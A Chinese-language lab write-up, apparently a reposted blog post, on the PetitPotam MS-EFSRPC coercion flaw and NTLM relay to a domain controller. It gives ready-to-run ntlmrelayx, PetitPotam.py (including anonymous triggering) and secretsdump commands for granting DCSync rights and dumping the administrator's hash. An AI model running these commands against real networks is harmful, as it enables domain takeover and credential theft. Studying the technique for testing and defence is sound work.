PetitPotam
Windows 操作系统中一个新发现的安全漏洞可被利用来强制远程 Windows 服务器(包括域控制器)向恶意目的地进行身份验证,从而允许攻击者发起 NTLM 中继攻击并完全接管 Windows 域。
这个被称为 PetitPotam 的漏洞通过强制“Windows 主机通过 MS 向其他机器进行身份验证而起作用” -EFSRPC EfsRpcOpenFileRaw 函数。
MS-EFSRPC
MS-EFSRPC是 Microsoft 的加密文件系统远程协议,用于对远程存储和通过网络访问的加密数据执行“维护和管理操作”。
具体来说,该攻击使域控制器能够使用 MS-EFSRPC 接口在恶意行为者的控制下对远程 NTLM 进行身份验证并共享其身份验证信息。这是通过连接到LSARPC来完成的,从而导致目标服务器连接到任意服务器并执行 NTLM 身份验证的场景。
攻击者可以通过使用 MS-EFSRPC 协议将 DC NTLM 凭据中继到 Active Directory 证书服务 AD CS Web 注册页面以注册 DC 证书,从而以域控制器为目标来发送其凭据。这将有效地为攻击者提供一个身份验证证书,该证书可用于作为 DC 访问域服务并破坏整个域。
Printerbug使得拥有控制域用户/计算机的攻击者可以指定域内的一台服务器,并使其对攻击者选择的目标进行身份验证。虽然不是一个微软承认的漏洞,但是跟Net-ntlmV1,非约束委派,NTLM_Relay,命名管道模拟这些手法的结合可以用来域内提权,本地提权,跨域等等利用。
遗憾的是,在PrintNightmare爆发之后,很多企业会选择关闭spoolss服务,使得Printerbug失效。在Printerbug逐渐失效的今天,PetitPotam来了,他也可以指定域内的一台服务器,并使其对攻击者选择的目标进行身份验证。而且在低版本(16以下)的情况底下,可以匿名触发。
Petitpotam
Petitpotam是继Windows PrintSpooler之后的一个无需验证,即可强制任意机器访问指定服务的漏洞。
环境
| HostName | IP |
|---|---|
| exchange | 10.1.1.17 |
| DC | 10.1.1.14 |
| MAC | 192.168.2.149 |
1.利用
python3 ntlmrelayx.py --remove-mic --escalate-user web -t ldap://10.1.1.14 -smb2support
--remove-mic #清楚mic标志--escalate-user #赋予指定用户dcsync权限-smb2support #支持SMB2协议-t #将票据中继到指定的ldap
python PetitPotam.py -d qin9.com -u mail -p 123.mail 192.168.2.149 10.1.1.18
python3 secretsdump.py qin9/web:[email protected] -just-dc-user qin9/administrator
2、低版本可以匿名触发
在08和12的环境,默认在网络安全:可匿名访问的命名管道中有三个netlogon、samr、lsarpc。因此在这个环境下是可以匿名触发的
python PetitPotam.py -d '' -u '' -p '' 192.168.2.149 10.1.1.17
至于我们还可以通过PetitPotam干嘛,之后会介绍的
原文始发于微信公众号(qin9):PetitPotam NTLM relay attack接管域控
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论